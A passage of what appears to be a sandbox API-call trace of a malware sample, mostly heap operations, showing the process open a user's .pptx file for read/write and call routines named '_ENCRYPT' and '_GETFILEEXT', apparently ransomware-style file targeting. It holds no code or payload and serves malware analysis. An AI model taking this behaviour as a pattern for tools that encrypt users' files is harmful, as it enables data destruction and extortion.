hHeap=0x650000, dwFlags=0x0, lpMem=0x690770 | out: hHeap=0x650000) returned 1 [0075.406] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e528 | out: hHeap=0x650000) returned 1 [0075.406] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690710 | out: hHeap=0x650000) returned 1 [0075.406] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e030 | out: hHeap=0x650000) returned 1 [0075.406] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690700 | out: hHeap=0x650000) returned 1 [0075.406] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e030 | out: hHeap=0x650000) returned 1 [0075.407] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690710 | out: hHeap=0x650000) returned 1 [0075.407] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e528 | out: hHeap=0x650000) returned 1 [0075.407] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690920 | out: hHeap=0x650000) returned 1 [0075.407] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e528 | out: hHeap=0x650000) returned 1 [0075.407] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690710 | out: hHeap=0x650000) returned 1 [0075.407] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e030 | out: hHeap=0x650000) returned 1 [0075.407] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690660 | out: hHeap=0x650000) returned 1 [0075.407] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e030 | out: hHeap=0x650000) returned 1 [0075.407] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690710 | out: hHeap=0x650000) returned 1 [0075.407] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e528 | out: hHeap=0x650000) returned 1 [0075.407] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690b40 | out: hHeap=0x650000) returned 1 [0075.407] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e528 | out: hHeap=0x650000) returned 1 [0075.407] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690710 | out: hHeap=0x650000) returned 1 [0075.407] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e030 | out: hHeap=0x650000) returned 1 [0075.407] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690980 | out: hHeap=0x650000) returned 1 [0075.407] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e030 | out: hHeap=0x650000) returned 1 [0075.407] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690710 | out: hHeap=0x650000) returned 1 [0075.407] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e528 | out: hHeap=0x650000) returned 1 [0075.407] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690850 | out: hHeap=0x650000) returned 1 [0075.407] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e528 | out: hHeap=0x650000) returned 1 [0075.407] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690710 | out: hHeap=0x650000) returned 1 [0075.407] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e030 | out: hHeap=0x650000) returned 1 [0075.407] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690960 | out: hHeap=0x650000) returned 1 [0075.407] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76d30000 [0075.408] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFile", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0075.408] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFile", cchWideChar=11, lpMultiByteStr=0x76e528, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFile", lpUsedDefaultChar=0x0) returned 11 [0075.408] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e528 | out: hHeap=0x650000) returned 1 [0075.408] GetProcAddress (hModule=0x76d30000, lpProcName="CreateFile") returned 0x0 [0075.408] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e030 | out: hHeap=0x650000) returned 1 [0075.408] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690960 | out: hHeap=0x650000) returned 1 [0075.408] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileA", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0075.408] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileA", cchWideChar=12, lpMultiByteStr=0x76e528, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFileA", lpUsedDefaultChar=0x0) returned 12 [0075.408] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e528 | out: hHeap=0x650000) returned 1 [0075.408] GetProcAddress (hModule=0x76d30000, lpProcName="CreateFileA") returned 0x76d453c6 [0075.408] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e030 | out: hHeap=0x650000) returned 1 [0075.408] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690710 | out: hHeap=0x650000) returned 1 [0075.408] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68cff0 | out: hHeap=0x650000) returned 1 [0075.408] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690960 | out: hHeap=0x650000) returned 1 [0075.408] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\-bwOHNgAEohzwnBTD\\VmWpxwQdQUQhtrKz9rx.pptx", cchWideChar=81, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 81 [0075.409] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\-bwOHNgAEohzwnBTD\\VmWpxwQdQUQhtrKz9rx.pptx", cchWideChar=81, lpMultiByteStr=0x674c58, cbMultiByte=81, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\-bwOHNgAEohzwnBTD\\VmWpxwQdQUQhtrKz9rx.pptx", lpUsedDefaultChar=0x0) returned 81 [0075.409] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x674c58 | out: hHeap=0x650000) returned 1 [0075.409] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690960 | out: hHeap=0x650000) returned 1 [0075.409] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690710 | out: hHeap=0x650000) returned 1 [0075.409] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6908e0 | out: hHeap=0x650000) returned 1 [0075.409] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690930 | out: hHeap=0x650000) returned 1 [0075.409] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690790 | out: hHeap=0x650000) returned 1 [0075.409] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6906b0 | out: hHeap=0x650000) returned 1 [0075.409] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6906c0 | out: hHeap=0x650000) returned 1 [0075.409] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68cff0 | out: hHeap=0x650000) returned 1 [0075.409] CreateFileA (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\-bwOHNgAEohzwnBTD\\VmWpxwQdQUQhtrKz9rx.pptx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\-bwohngaeohzwnbtd\\vmwpxwqdquqhtrkz9rx.pptx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x128 [0075.409] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76afe8 | out: hHeap=0x650000) returned 1 [0075.409] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6906b0 | out: hHeap=0x650000) returned 1 [0075.409] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e528 | out: hHeap=0x650000) returned 1 [0075.409] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x1, lpMultiByteStr=0x771fe8, cbMultiByte=81, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 81 [0075.409] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x1, lpMultiByteStr=0x771fe8, cbMultiByte=81, lpWideCharStr=0x6b9e98, cchWideChar=81 | out: lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\-bwOHNgAEohzwnBTD\\VmWpxwQdQUQhtrKz9rx.pptx") returned 81 [0075.409] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e468 | out: hHeap=0x650000) returned 1 [0075.409] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6b9e98 | out: hHeap=0x650000) returned 1 [0075.409] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x771fe8 | out: hHeap=0x650000) returned 1 [0075.410] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76af88 | out: hHeap=0x650000) returned 1 [0075.410] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690790 | out: hHeap=0x650000) returned 1 [0075.410] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e1f8 | out: hHeap=0x650000) returned 1 [0075.410] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e408 | out: hHeap=0x650000) returned 1 [0075.410] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690790 | out: hHeap=0x650000) returned 1 [0075.410] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76af88 | out: hHeap=0x650000) returned 1 [0075.410] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e3d8 | out: hHeap=0x650000) returned 1 [0075.410] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690790 | out: hHeap=0x650000) returned 1 [0075.410] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e408 | out: hHeap=0x650000) returned 1 [0075.410] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e0c0 | out: hHeap=0x650000) returned 1 [0075.410] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690790 | out: hHeap=0x650000) returned 1 [0075.410] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e3d8 | out: hHeap=0x650000) returned 1 [0075.410] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e180 | out: hHeap=0x650000) returned 1 [0075.410] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690790 | out: hHeap=0x650000) returned 1 [0075.410] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e0c0 | out: hHeap=0x650000) returned 1 [0075.410] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e648 | out: hHeap=0x650000) returned 1 [0075.410] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690790 | out: hHeap=0x650000) returned 1 [0075.410] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e180 | out: hHeap=0x650000) returned 1 [0075.410] FreeLibrary (hLibModule=0x76d30000) returned 1 [0075.410] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690770 | out: hHeap=0x650000) returned 1 [0075.410] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690700 | out: hHeap=0x650000) returned 1 [0075.410] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690920 | out: hHeap=0x650000) returned 1 [0075.410] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690660 | out: hHeap=0x650000) returned 1 [0075.410] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690b40 | out: hHeap=0x650000) returned 1 [0075.410] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690980 | out: hHeap=0x650000) returned 1 [0075.410] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690850 | out: hHeap=0x650000) returned 1 [0075.410] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68d748 | out: hHeap=0x650000) returned 1 [0075.411] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e558 | out: hHeap=0x650000) returned 1 [0075.411] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690970 | out: hHeap=0x650000) returned 1 [0075.411] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76a688 | out: hHeap=0x650000) returned 1 [0075.411] PeekMessageW (in: lpMsg=0x61eeb4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61eeb4) returned 0 [0075.411] PeekMessageW (in: lpMsg=0x61eeb4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61eeb4) returned 0 [0075.411] CharLowerBuffW (in: lpsz="int", cchLength=0x3 | out: lpsz="int") returned 0x3 [0075.411] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76d30000 [0075.412] FreeLibrary (hLibModule=0x76d30000) returned 1 [0075.412] PeekMessageW (in: lpMsg=0x61eeb4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61eeb4) returned 0 [0075.412] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="no", cchCount1=2, lpString2="no", cchCount2=2) returned 2 [0075.412] PeekMessageW (in: lpMsg=0x61f2d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f2d4) returned 0 [0075.412] CharUpperBuffW (in: lpsz="_ENCRYPT", cchLength=0x8 | out: lpsz="_ENCRYPT") returned 0x8 [0075.412] PeekMessageW (in: lpMsg=0x61f07c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f07c) returned 0 [0075.418] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690900 [0075.418] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690970 [0075.418] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68cff0 [0075.418] CharUpperBuffW (in: lpsz="_GETFILEEXT", cchLength=0xb | out: lpsz="_GETFILEEXT") returned 0xb [0075.418] PeekMessageW (in: lpMsg=0x61eb4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61eb4c) returned 0 [0075.419] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690940 [0075.419] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68d838 [0075.419] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e528 [0075.419] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690b40 [0075.419] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76afe8 [0075.419] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="x", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0075.419] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="tx", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0075.419] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ptx", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0075.419] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="pptx", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0075.419] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".pptx", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0075.419] PeekMessageW (in: lpMsg=0x61f07c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f07c) returned 0 [0075.419] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690970 [0075.419] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e4c8 [0075.419] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6906b0 [0075.419] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x18) returned 0x6f96c8 [0075.419] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e408 [0075.419] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690940 [0075.419] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0xb0) returned 0x69bce0 [0075.419] PeekMessageW (in: lpMsg=0x61f07c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f07c) returned 0 [0075.419] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6906b0 [0075.419] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e4c8 [0075.419] PeekMessageW (in: lpMsg=0x61f07c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f07c) returned 0 [0075.419] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690850 [0075.420] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68d860 [0075.420] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e4c8 [0075.420] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6906c0 [0075.420] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68d6f8 [0075.420] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e528 [0075.420] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690980 [0075.420] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76afe8 [0075.420] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\-bwOHNgAEohzwnBTD\\VmWpxwQdQUQhtrKz9rx.pptx", lpFindFileData=0x61e978 | out: lpFindFileData=0x61e978*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4e4617a0, ftCreationTime.dwHighDateTime=0x1d5e321, ftLastAccessTime.dwLowDateTime=0x787174a0, ftLastAccessTime.dwHighDateTime=0x1d5d7ed, ftLastWriteTime.dwLowDateTime=0x787174a0, ftLastWriteTime.dwHighDateTime=0x1d5d7ed, nFileSizeHigh=0x0, nFileSizeLow=0x3ec3, dwReserved0=0x0, dwReserved1=0x657690, cFileName="VmWpxwQdQUQhtrKz9rx.pptx", cAlternateFileName="VMWPXW~1.PPT")) returned 0x6b89b8 [0075.420] FindClose (in: hFindFile=0x6b89b8 | out: hFindFile=0x6b89b8) returned 1 [0075.420] PeekMessageW (in: lpMsg=0x61f07c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f07c) returned 0 [0075.420] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6906c0 [0075.420] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68d068 [0075.420] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e4c8 [0075.420] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690980 [0075.420] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68d630 [0075.420] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76afe8 [0075.420] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690660 [0075.420] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b0d8 [0075.421] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\-bwOHNgAEohzwnBTD\\VmWpxwQdQUQhtrKz9rx.pptx", lpFindFileData=0x61e978 | out: lpFindFileData=0x61e978*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4e4617a0, ftCreationTime.dwHighDateTime=0x1d5e321, ftLastAccessTime.dwLowDateTime=0x787174a0, ftLastAccessTime.dwHighDateTime=0x1d5d7ed, ftLastWriteTime.dwLowDateTime=0x787174a0, ftLastWriteTime.dwHighDateTime=0x1d5d7ed, nFileSizeHigh=0x0, nFileSizeLow=0x3ec3, dwReserved0=0x0, dwReserved1=0x657690, cFileName="VmWpxwQdQUQhtrKz9rx.pptx", cAlternateFileName="VMWPXW~1.PPT")) returned 0x6b89b8 [0075.421] FindClose (in: hFindFile=0x6b89b8 | out: hFindFile=0x6b89b8) returned 1 [0075.421] PeekMessageW (in: lpMsg=0x61f07c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f07c) returned 0 [0075.421] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690980 [0075.421] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690660 [0075.421] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x18) returned 0x6f96c8 [0075.421] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690920 [0075.421] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x18) returned 0x6f96e8 [0075.421] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\-bwOHNgAEohzwnBTD\\VmWpxwQdQUQhtrKz9rx.pptx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0075.421] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\-bwOHNgAEohzwnBTD\\VmWpxwQdQUQhtrKz9rx.pptx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0075.421] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=":\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\-bwOHNgAEohzwnBTD\\VmWpxwQdQUQhtrKz9rx.pptx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0075.421] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\-bwOHNgAEohzwnBTD\\VmWpxwQdQUQhtrKz9rx.pptx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0075.421] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\-bwOHNgAEohzwnBTD\\VmWpxwQdQUQhtrKz9rx.pptx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0075.421] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sers\\5p5NrGJn0jS HALPmcxz\\Desktop\\-bwOHNgAEohzwnBTD\\VmWpxwQdQUQhtrKz9rx.pptx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0075.421] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ers\\5p5NrGJn0jS HALPmcxz\\Desktop\\-bwOHNgAEohzwnBTD\\VmWpxwQdQUQhtrKz9rx.pptx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0075.421] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rs\\5p5NrGJn0jS HALPmcxz\\Desktop\\-bwOHNgAEohzwnBTD\\VmWpxwQdQUQhtrKz9rx.pptx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0075.421] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s\\5p5NrGJn0jS HALPmcxz\\Desktop\\-bwOHNgAEohzwnBTD\\VmWpxwQdQUQhtrKz9rx.pptx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0075.421] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\5p5NrGJn0jS HALPmcxz\\Desktop\\-bwOHNgAEohzwnBTD\\VmWpxwQdQUQhtrKz9rx.pptx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0075.421] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5p5NrGJn0jS HALPmcxz\\Desktop\\-bwOHNgAEohzwnBTD\\VmWpxwQdQUQhtrKz9rx.pptx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0075.421] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p5NrGJn0jS HALPmcxz\\Desktop\\-bwOHNgAEohzwnBTD\\VmWpxwQdQUQhtrKz9rx.pptx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0075.422] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5NrGJn0jS HALPmcxz\\Desktop\\-bwOHNgAEohzwnBTD\\VmWpxwQdQUQhtrKz9rx.pptx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0075.422] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NrGJn0jS HALPmcxz\\Desktop\\-bwOHNgAEohzwnBTD\\VmWpxwQdQUQhtrKz9rx.pptx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0075.422] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rGJn0jS HALPmcxz\\Desktop\\-bwOHNgAEohzwnBTD\\VmWpxwQdQUQhtrKz9rx.pptx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0075.422] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GJn0jS HALPmcxz\\Desktop\\-bwOHNgAEohzwnBTD\\VmWpxwQdQUQhtrKz9rx.pptx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0075.422] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Jn0jS HALPmcxz\\Desktop\\-bwOHNgAEohzwnBTD\\VmWpxwQdQUQhtrKz9rx.pptx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0075.422] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="n0jS HALPmcxz\\Desktop\\-bwOHNgAEohzwnBTD\\VmWpxwQdQUQhtrKz9rx.pptx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0075.422] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="0jS HALPmcxz\\Desktop\\-bwOHNgAEohzwnBTD\\VmWpxwQdQUQhtrKz9rx.pptx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0075.422] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="jS HALPmcxz\\Desktop\\-bwOHNgAEohzwnBTD\\VmWpxwQdQUQhtrKz9rx.pptx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0075.422] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="S HALPmcxz\\Desktop\\-bwOHNgAEohzwnBTD\\VmWpxwQdQUQhtrKz9rx.pptx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0075.422] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=" HALPmcxz\\Desktop\\-bwOHNgAEohzwnBTD\\VmWpxwQdQUQhtrKz9rx.pptx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0075.422] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HALPmcxz\\Desktop\\-bwOHNgAEohzwnBTD\\VmWpxwQdQUQhtrKz9rx.pptx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0075.422] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ALPmcxz\\Desktop\\-bwOHNgAEohzwnBTD\\VmWpxwQdQUQhtrKz9rx.pptx\"", cchCount1=10, 